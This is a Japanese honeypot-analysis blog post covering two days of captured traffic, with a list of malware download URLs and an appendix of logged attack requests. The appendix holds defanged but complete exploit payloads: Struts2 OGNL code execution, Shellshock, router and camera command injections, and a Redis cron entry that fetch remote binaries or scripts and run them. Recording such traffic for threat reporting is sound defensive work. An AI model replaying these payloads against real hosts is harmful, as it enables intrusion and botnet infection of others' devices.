sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(220-221日目:3/21-3/22)

Honeytrap簡易分析(220-221日目:3/21-3/22)となります。
※80ポートは除いています。

f:id:one-chick-sec:20190323153750p:plain

特定の時間帯でスパイクしている通信はSMB関連の通信であり、新規の脆弱性ではありませんでした。

◾️ペイロード
.....SMBr.....S...................@..b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.


<新規マルウェア

ポート マルウェアダウンロード先 VT
8000 hxxp://185[.]244[.]25[.]114/kalon[.]arm5

VirusTotal
8000 hxxp://209[.]141[.]40[.]213/avtech

VirusTotal
10000 hxxp://192[.]192[.]78[.]216:9090/scan/inux[.]php

VirusTotal
52869 hxxp://104[.]248[.]23[.]140/tenshimips

VirusTotal


IoT関連では Gafgy 亜種のダウンロードが多い傾向でした。一方でポート6379宛ての通信も増加して来ていました。
ペイロード
*3..$3..SET..$5..Back1..$59....* * * * * curl -fsSL hxxp://w[.]3ei[.]xyz:43768/lll.sh | sh....

 

以上となります。

<参考:マルウェアダウンロードに使われたペイロード>

GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:81/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:81[.][.][.][.]
GET /index[.]action HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*1[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/index[.]action[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /index[.]do HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*2[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/index[.]do[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /struts2-rest-showcase/orders[.]xhtml HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Content-Type: %{(#nike='multipart/form-data')[.](#dm=@ognl[.]OgnlContext@DEFAULT_MEMBER_ACCESS)[.](#_memberAccess?(#_memberAccess=#dm):*3[.](#ognlUtil[.]getExcludedPackageNames()[.]clear())[.](#ognlUtil[.]getExcludedClasses()[.]clear())[.](#context[.]setMemberAccess(#dm))))[.](#cmd='cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download[.]exe C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe & cmd[.]exe /c C:/Windows/temp/fexbxidrwkqkbyt9335[.]exe')[.](#iswin=(@java[.]lang[.]System@getProperty('os[.]name')[.]toLowerCase()[.]contains('win')))[.](#cmds=(#iswin?{'cmd[.]exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))[.](#p=new java[.]lang[.]ProcessBuilder(#cmds))[.](#p[.]redirectErrorStream(true))[.](#process=#p[.]start())[.](#ros=(@org[.]apache[.]struts2[.]ServletActionContext@getResponse()[.]getOutputStream()))[.](@org[.]apache[.]commons[.]io[.]IOUtils@copy(#process[.]getInputStream(),#ros))[.](#ros[.]flush())}[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:82/struts2-rest-showcase/orders[.]xhtml[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:82[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:90/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:90[.][.][.][.]
*3[.][.]$3[.][.]SET[.][.]$5[.][.]Back1[.][.]$59[.][.][.][.]* * * * * curl -fsSL hxxp://w[.]3ei[.]xyz:43768/lll[.]sh | sh[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/kalon[.]arm5;chmod 777 kalon[.]arm5;sh kalon[.]arm5)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/kalon[.]arm5;chmod 777 kalon[.]arm5;sh kalon[.]arm5)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.][.][.]
GET /cgi-bin/nobody/Search[.]cgi?action=cgi_query&ip=google[.]com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account[.]User1[.]Password>$(cd /tmp; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin HTTP/1[.]1[.][.]User-Agent: Sefa[.][.]Accept: text/html,application/xhtml xml,application/xml;q=0[.]9,*/*;q=0[.]8[.][.]Accept-Language: en-GB,en;q=0[.]5[.][.]Accept-Encoding: gzip, deflate[.][.]Connection: close[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8008/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8008[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8081/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8081[.][.][.][.]
POST /login[.]gch HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]Frm_Logintoken=4&Username=root&Password=W!n0&oO7[.]POST /manager_dev_ping_t[.]gch HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]&Host=;$(cd /tmp; rm -rf *; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/bins/apep[.]mips; chmod 777 apep[.]mips; [.]/apep[.]mips selfrep[.]zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitPOST /getpage[.]gch?pid=1001&logout=1 HTTP/1[.]1[.][.]User-Agent: NoPublicity <3[.][.]Content-Length: 420[.][.]Connection: keep-alive[.][.]Accept: */*[.][.][.][.]broke bitches
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Connection: Keep-Alive[.][.]Accept: */*[.][.]Accept-Language: zh-cn[.][.]Referer: hxxp://xxx[.]xxx[.]xxx[.]xxx:8090/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 9[.]0; Windows NT 6[.]1)[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.][.][.]
GET /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.]Accept: */*[.][.][.][.]
HEAD /FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid[.]hognoob[.]se/download[.]exe HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:8090[.][.]User-Agent: Mozilla/4[.]0 (compatible; MSIE 7[.]0; Windows NT 5[.]1; TencentTraveler 4[.]0)[.][.]Accept: */*[.][.][.][.]
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1[.]Host: xxx[.]xxx[.]xxx[.]xxx[.]User-Agent: () { :; };  /bin/rm -rf /tmp/S0[.]php && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/ && /usr/bin/wget -c   -t1 -T2 hxxp://xxx[.]xxx[.]xxx[.]xxx:9090/scan/inux[.]php -O /tmp/pig && wget -c   -t1 -T2 hxxp://xxx[.]xxx[.]xxx[.]xxx:9090/scan/inux[.]php -O  /tmp/pig  && rm /tmp/pig  ;0<&1 2>&1 [.][.][.] &  [.][.][.]

POST /picsdesc[.]xml HTTP/1[.]1[.][.]Host: xxx[.]xxx[.]xxx[.]xxx:52869[.][.]SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping[.][.]Content-Length: 632[.][.]Accept-Encoding: gzip, deflate, compress[.][.]Accept: */*[.][.]User-Agent: python-requests/2[.]2[.]1 CPython/2[.]7[.]6 Linux/3[.]13[.]0-164-generic[.][.][.][.]<?xml version="1[.]0" ?><s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; wget hxxp://xxx[.]xxx[.]xxx[.]xxx/tenshimips -O t`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

 

*1:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class

*2:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class

*3:#container=#context['com[.]opensymphony[.]xwork2[.]ActionContext[.]container'])[.](#ognlUtil=#container[.]getInstance(@com[.]opensymphony[.]xwork2[.]ognl[.]OgnlUtil@class